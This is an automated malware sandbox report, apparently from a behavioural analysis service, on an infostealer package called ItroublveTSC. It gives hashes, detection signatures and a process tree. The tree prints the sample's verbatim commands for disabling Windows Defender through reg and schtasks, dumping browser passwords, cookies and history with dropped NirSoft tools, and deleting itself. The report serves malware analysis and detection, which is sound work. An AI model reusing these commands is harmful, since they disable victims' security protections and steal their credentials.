Overview
overview
10Static
static
3ItroublveT...SC.exe
windows7-x64
10ItroublveT...SC.exe
windows10-2004-x64
10ItroublveT...rv.exe
windows7-x64
9ItroublveT...rv.exe
windows10-2004-x64
9ItroublveT...ram.js
windows7-x64
1ItroublveT...ram.js
windows10-2004-x64
1ItroublveT...er.vbs
windows7-x64
1ItroublveT...er.vbs
windows10-2004-x64
1ItroublveT...es.vbs
windows7-x64
1ItroublveT...es.vbs
windows10-2004-x64
1ItroublveT...LI.exe
windows7-x64
1ItroublveT...LI.exe
windows10-2004-x64
1ItroublveT...re.dll
windows7-x64
1ItroublveT...re.dll
windows10-2004-x64
1ItroublveT...er.dll
windows7-x64
1ItroublveT...er.dll
windows10-2004-x64
1ItroublveT...ns.dll
windows7-x64
1ItroublveT...ns.dll
windows10-2004-x64
1ItroublveT...er.dll
windows7-x64
1ItroublveT...er.dll
windows10-2004-x64
1ItroublveT...me.dll
windows7-x64
1ItroublveT...me.dll
windows10-2004-x64
1ItroublveT...en.dll
windows7-x64
1ItroublveT...en.dll
windows10-2004-x64
1ItroublveT...ib.dll
windows7-x64
1ItroublveT...ib.dll
windows10-2004-x64
1ItroublveT...le.dll
windows7-x64
1ItroublveT...le.dll
windows10-2004-x64
1ItroublveT...le.dll
windows7-x64
1ItroublveT...le.dll
windows10-2004-x64
1ItroublveT...le.dll
windows7-x64
1ItroublveT...le.dll
windows10-2004-x64
1Analysis
-
max time kernel
93s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
20/02/2024, 14:37
Static task
static1
Behavioral task
behavioral1
Sample
ItroublveTSC/ItroubleTSC.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ItroublveTSC/ItroubleTSC.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
ItroublveTSC/bin/Binaries/RtkBtManServ.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
ItroublveTSC/bin/Binaries/RtkBtManServ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
ItroublveTSC/bin/Program.js
Resource
win7-20240220-en
Behavioral task
behavioral6
Sample
ItroublveTSC/bin/Program.js
Resource
win10v2004-20240220-en
Behavioral task
behavioral7
Sample
ItroublveTSC/bin/Properties/Resources.Designer.vbs
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
ItroublveTSC/bin/Properties/Resources.Designer.vbs
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
ItroublveTSC/bin/Properties/Resources.vbs
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
ItroublveTSC/bin/Properties/Resources.vbs
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
ItroublveTSC/bin/obf/CLI.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
ItroublveTSC/bin/obf/CLI.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
ItroublveTSC/bin/obf/Confuser.Core.dll
Resource
win7-20240220-en
Behavioral task
behavioral14
Sample
ItroublveTSC/bin/obf/Confuser.Core.dll
Resource
win10v2004-20240220-en
Behavioral task
behavioral15
Sample
ItroublveTSC/bin/obf/Confuser.DynCipher.dll
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
ItroublveTSC/bin/obf/Confuser.DynCipher.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
ItroublveTSC/bin/obf/Confuser.Protections.dll
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
ItroublveTSC/bin/obf/Confuser.Protections.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
ItroublveTSC/bin/obf/Confuser.Renamer.dll
Resource
win7-20240215-en
Behavioral task
behavioral20
Sample
ItroublveTSC/bin/obf/Confuser.Renamer.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
ItroublveTSC/bin/obf/Confuser.Runtime.dll
Resource
win7-20240220-en
Behavioral task
behavioral22
Sample
ItroublveTSC/bin/obf/Confuser.Runtime.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
ItroublveTSC/bin/obf/Teen.dll
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
ItroublveTSC/bin/obf/Teen.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
ItroublveTSC/bin/obf/dnlib.dll
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
ItroublveTSC/bin/obf/dnlib.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
ItroublveTSC/bin/packages/System.IO.Compression.ZipFile.4.3.0/lib/net46/System.IO.Compression.ZipFile.dll
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
ItroublveTSC/bin/packages/System.IO.Compression.ZipFile.4.3.0/lib/net46/System.IO.Compression.ZipFile.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
ItroublveTSC/bin/packages/System.IO.Compression.ZipFile.4.3.0/lib/netstandard1.3/System.IO.Compression.ZipFile.dll
Resource
win7-20231129-en
Behavioral task
behavioral30
Sample
ItroublveTSC/bin/packages/System.IO.Compression.ZipFile.4.3.0/lib/netstandard1.3/System.IO.Compression.ZipFile.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
ItroublveTSC/bin/packages/System.IO.Compression.ZipFile.4.3.0/ref/net46/System.IO.Compression.ZipFile.dll
Resource
win7-20231215-en
Behavioral task
behavioral32
Sample
ItroublveTSC/bin/packages/System.IO.Compression.ZipFile.4.3.0/ref/net46/System.IO.Compression.ZipFile.dll
Resource
win10v2004-20231215-en
General
-
Target
ItroublveTSC/ItroubleTSC.exe
-
Size
6.7MB
-
MD5
a43a7249dfe471610fb6bc963f22e868
-
SHA1
9b4caf613225d8266a448298bd46370b9b7e9a89
-
SHA256
8c221e4939325c83f4d92a9fe0e0b64133a224e91651f30bda1256cebcf59acf
-
SHA512
4734ac42c5908d4f3365f773c5a0d5dac0afd536a7d5e04db18ad5f87aad034a4064fe09dc44ce242036a7a1370498b5580e5b6c5521e8388618fadfe071df73
-
SSDEEP
98304:MqXpy05Q0N1rsYSZ6BoXh1kkypSH3Oh5Bemg:1405QYtsTEB08T8HehLv
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/224-27-0x00000225CCC40000-0x00000225CCF82000-memory.dmp WebBrowserPassView behavioral2/files/0x000600000002328c-91.dat WebBrowserPassView -
Nirsoft 7 IoCs
resource yara_rule behavioral2/memory/224-27-0x00000225CCC40000-0x00000225CCF82000-memory.dmp Nirsoft behavioral2/files/0x0006000000023287-81.dat Nirsoft behavioral2/files/0x000600000002328c-91.dat Nirsoft behavioral2/files/0x0006000000023289-113.dat Nirsoft behavioral2/memory/1068-123-0x0000000000400000-0x000000000045B000-memory.dmp Nirsoft behavioral2/memory/4812-116-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/files/0x000600000002328b-137.dat Nirsoft -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation ItroubleTSC.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation RtkBtManServ.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager8403127.exe ItroubleTSC.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager8403127.exe ItroubleTSC.exe -
Executes dropped EXE 7 IoCs
pid Process 224 RtkBtManServ.exe 2096 bfsvc.exe 4352 snuvcdsm.exe 1068 winhlp32.exe 4812 splwow64.exe 2432 hh.exe 776 xwizard.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000600000002328a-108.dat upx behavioral2/files/0x0006000000023288-106.dat upx behavioral2/memory/1068-123-0x0000000000400000-0x000000000045B000-memory.dmp upx behavioral2/memory/4812-116-0x0000000000400000-0x000000000041B000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 28 discord.com 29 discord.com 30 discord.com 33 discord.com 23 discord.com 24 discord.com 25 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 api64.ipify.org 22 api64.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings ItroubleTSC.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings RtkBtManServ.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4352 snuvcdsm.exe 4352 snuvcdsm.exe 4352 snuvcdsm.exe 4352 snuvcdsm.exe 2432 hh.exe 2432 hh.exe 776 xwizard.exe 776 xwizard.exe 776 xwizard.exe 776 xwizard.exe 776 xwizard.exe 776 xwizard.exe 776 xwizard.exe 776 xwizard.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 224 RtkBtManServ.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1068 wrote to memory of 224 1068 ItroubleTSC.exe 86 PID 1068 wrote to memory of 224 1068 ItroubleTSC.exe 86 PID 1068 wrote to memory of 1820 1068 ItroubleTSC.exe 87 PID 1068 wrote to memory of 1820 1068 ItroubleTSC.exe 87 PID 1068 wrote to memory of 1820 1068 ItroubleTSC.exe 87 PID 1820 wrote to memory of 1780 1820 cmd.exe 105 PID 1820 wrote to memory of 1780 1820 cmd.exe 105 PID 1820 wrote to memory of 1780 1820 cmd.exe 105 PID 1820 wrote to memory of 4812 1820 cmd.exe 104 PID 1820 wrote to memory of 4812 1820 cmd.exe 104 PID 1820 wrote to memory of 4812 1820 cmd.exe 104 PID 1820 wrote to memory of 1064 1820 cmd.exe 89 PID 1820 wrote to memory of 1064 1820 cmd.exe 89 PID 1820 wrote to memory of 1064 1820 cmd.exe 89 PID 1820 wrote to memory of 2432 1820 cmd.exe 90 PID 1820 wrote to memory of 2432 1820 cmd.exe 90 PID 1820 wrote to memory of 2432 1820 cmd.exe 90 PID 1820 wrote to memory of 3932 1820 cmd.exe 103 PID 1820 wrote to memory of 3932 1820 cmd.exe 103 PID 1820 wrote to memory of 3932 1820 cmd.exe 103 PID 1820 wrote to memory of 1568 1820 cmd.exe 102 PID 1820 wrote to memory of 1568 1820 cmd.exe 102 PID 1820 wrote to memory of 1568 1820 cmd.exe 102 PID 1820 wrote to memory of 1740 1820 cmd.exe 91 PID 1820 wrote to memory of 1740 1820 cmd.exe 91 PID 1820 wrote to memory of 1740 1820 cmd.exe 91 PID 1820 wrote to memory of 4032 1820 cmd.exe 92 PID 1820 wrote to memory of 4032 1820 cmd.exe 92 PID 1820 wrote to memory of 4032 1820 cmd.exe 92 PID 1820 wrote to memory of 516 1820 cmd.exe 101 PID 1820 wrote to memory of 516 1820 cmd.exe 101 PID 1820 wrote to memory of 516 1820 cmd.exe 101 PID 1820 wrote to memory of 968 1820 cmd.exe 93 PID 1820 wrote to memory of 968 1820 cmd.exe 93 PID 1820 wrote to memory of 968 1820 cmd.exe 93 PID 1820 wrote to memory of 4848 1820 cmd.exe 94 PID 1820 wrote to memory of 4848 1820 cmd.exe 94 PID 1820 wrote to memory of 4848 1820 cmd.exe 94 PID 1820 wrote to memory of 2388 1820 cmd.exe 100 PID 1820 wrote to memory of 2388 1820 cmd.exe 100 PID 1820 wrote to memory of 2388 1820 cmd.exe 100 PID 1820 wrote to memory of 212 1820 cmd.exe 95 PID 1820 wrote to memory of 212 1820 cmd.exe 95 PID 1820 wrote to memory of 212 1820 cmd.exe 95 PID 1820 wrote to memory of 1700 1820 cmd.exe 96 PID 1820 wrote to memory of 1700 1820 cmd.exe 96 PID 1820 wrote to memory of 1700 1820 cmd.exe 96 PID 1820 wrote to memory of 2204 1820 cmd.exe 97 PID 1820 wrote to memory of 2204 1820 cmd.exe 97 PID 1820 wrote to memory of 2204 1820 cmd.exe 97 PID 1820 wrote to memory of 4776 1820 cmd.exe 98 PID 1820 wrote to memory of 4776 1820 cmd.exe 98 PID 1820 wrote to memory of 4776 1820 cmd.exe 98 PID 1820 wrote to memory of 4780 1820 cmd.exe 99 PID 1820 wrote to memory of 4780 1820 cmd.exe 99 PID 1820 wrote to memory of 4780 1820 cmd.exe 99 PID 1820 wrote to memory of 1224 1820 cmd.exe 106 PID 1820 wrote to memory of 1224 1820 cmd.exe 106 PID 1820 wrote to memory of 1224 1820 cmd.exe 106 PID 1820 wrote to memory of 3260 1820 cmd.exe 107 PID 1820 wrote to memory of 3260 1820 cmd.exe 107 PID 1820 wrote to memory of 3260 1820 cmd.exe 107 PID 1820 wrote to memory of 1316 1820 cmd.exe 108 PID 1820 wrote to memory of 1316 1820 cmd.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\ItroublveTSC\ItroubleTSC.exe"C:\Users\Admin\AppData\Local\Temp\ItroublveTSC\ItroubleTSC.exe"1⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs6VVD0f1LAygLoWqb2bwihIKUiV6AjIPq+F0/2bY0SdZAL4jj1M9OW77T/5BLO4HYGZPLytTYMXu/WuwX4WP4h931kcLt2QeamqluOUxHKXYiLCBrlkfRVrkLuPBjH79og=2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:224 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"3⤵
- Checks computer location settings
PID:3396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat4⤵PID:2448
-
C:\Users\Admin\AppData\Local\Temp\bfsvc.exeC:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"5⤵
- Executes dropped EXE
PID:2096
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"3⤵
- Checks computer location settings
PID:3012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat4⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeC:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4352
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"3⤵
- Checks computer location settings
PID:2600 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat4⤵PID:3300
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exeC:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"5⤵
- Executes dropped EXE
PID:1068
-
-
C:\Users\Admin\AppData\Local\Temp\splwow64.exeC:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"5⤵
- Executes dropped EXE
PID:4812
-
-
C:\Users\Admin\AppData\Local\Temp\hh.exeC:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2432
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"3⤵
- Checks computer location settings
PID:2808 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat4⤵PID:112
-
C:\Users\Admin\AppData\Local\Temp\xwizard.exeC:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:776
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"3⤵PID:2044
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2196
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:1064
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:2432
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1740
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4032
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:968
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤3⤵PID:4848
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:212
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:4776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:4780
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:2388
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:516
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1568
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3932
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:4812
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:1780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:1224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:3260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:1316
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:4604
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:3608
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:3480
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:2740
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:4612
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:752
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:64
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2236
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2044
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:2112
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD55c45226c7bdcd87ae920b1717198c4a4
SHA11ddd033bc2e4398dfd19ba5cb321e05b293e7ab6
SHA256a3a582b7b4e21cb54fa5c7a2f0e39d10a4c12de1c376d86e909d9c7b3047287f
SHA51267596b4b7bdd3cfad64fa205cb9b74a6d4f5f4b3efd3eb47a68d831e8a342d7ffb784d8a19a4f845ed86c6f3683ea9286cf5eed59b8e5d8c2f487d1a5f8abb2c
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
14KB
MD5fd15e4304a8ee8f63b45cc91292e6a75
SHA191bb5c556a0d9033528e5d784c08805232dab77b
SHA2567c51d71cff9cf8c94d1a9b64529c10091648fd9005ed75fcd7441c3d4186d404
SHA512e0b2b9ff5cde8dba01d1ce3b49fe32a2b16aa41c5aad97adfe1492fd1cb8684b236be05bb9e8110bd1ab20de34feece6a965a71ff94daa18f961d61a3626e634
-
Filesize
2.8MB
MD588ab0bb59b0b20816a833ba91c1606d3
SHA172c09b7789a4bac8fee41227d101daed8437edeb
SHA256f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA51205cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
Filesize
2.1MB
MD5a1a0977da5cd77a292cb87fe324dbe83
SHA1bb69891fb0b6407c1a67b8fe69224d9cada54c2e
SHA256030393968e83ed52eba2212da84df60a7128af0d417d5b6c3b8fa99b955ded64
SHA5127a7e1062a66f81901d8dfb3fdc6adf69813b7c2c12514f36ad81b0a6f303bb2be010be2a2be9d4291977d326e6468c5d48eae7671adcf180eba1db8a4a334f62
-
Filesize
2.0MB
MD554af06f2b69d4d90dd162e4613707412
SHA143780c14f45ad948abe095f788a3543dacfe8681
SHA256094cbcb6a2d968add12514b0b211b7a9d5362acc3ee9a2f5ee1ff25f0762c0cd
SHA5123d9cca2149369caa5e1174af3cee690eca10a31ebc58e444147493e47cdae46e6299a93e71195cac667b4c2511212275bd8d1421e39004393a01be43e371647e
-
Filesize
529B
MD55242530a2b65089696f3cf8e5ee02ff7
SHA1d604293148cdd953b3368c54920c043cffe9e1c1
SHA256239a1d9844ddbd0e650f8e5de69a2a40067106a79878fa4948a8039f1573b781
SHA5127aafe122d3b7b9d377f689a872c2306c3b04d5a8a7e4df69b65370e48356db416b5cacc6681a1f7315d0ad730fd12b651115a81bd4c880033e5ef89fa605c39a
-
Filesize
71KB
MD5899d3ed011eb58459b8a4fc2b81f0924
SHA180361f1e0b93143ec1ddfee156760f5938c85791
SHA2565e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954
SHA512802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05
-
Filesize
2.8MB
MD577710874daaf1904893f62298d8d7c6f
SHA1a2725d388f0246dbf7d748b5c0e600225d2452d3
SHA256840979ba08947ef88ae7c2873439b0a957f491989d57fddeadf3a7aa2a8f0baf
SHA5120e1aefa3872871f80df3d1a2985fc7e288caa66412051836c107781792b435b5821cf476223cc8232720fb8228b9d9a03411874700897ac6866db6a0d47c0389
-
Filesize
70B
MD5d90accebb3f79fe65cd938425c07b0ae
SHA19df3812a88d87dd419cd9e89afa5fb1d71be0dc9
SHA256aca74cefaef4b7a32338c9c63187cffa1e808b54ab218a064007683ad1bd3a0e
SHA51244013bfda1dbe5b217d4872e8d550cd00471cb8b969ffd6b07f83b0c59ac20ec2512d275a4603cc00e5de3a04666f66e897601ba51a5e02af622e5139ac04560
-
Filesize
74B
MD5808099bfbd62ec04f0ed44959bbc6160
SHA1f4b6853d958c2c4416f6e4a5be8a11d86f64c023
SHA256f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8
SHA512e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0
-
Filesize
156B
MD5eb51755b637423154d1341c6ee505f50
SHA1d71d27e283b26e75e58c0d02f91d91a2e914c959
SHA256db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9
SHA512e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5
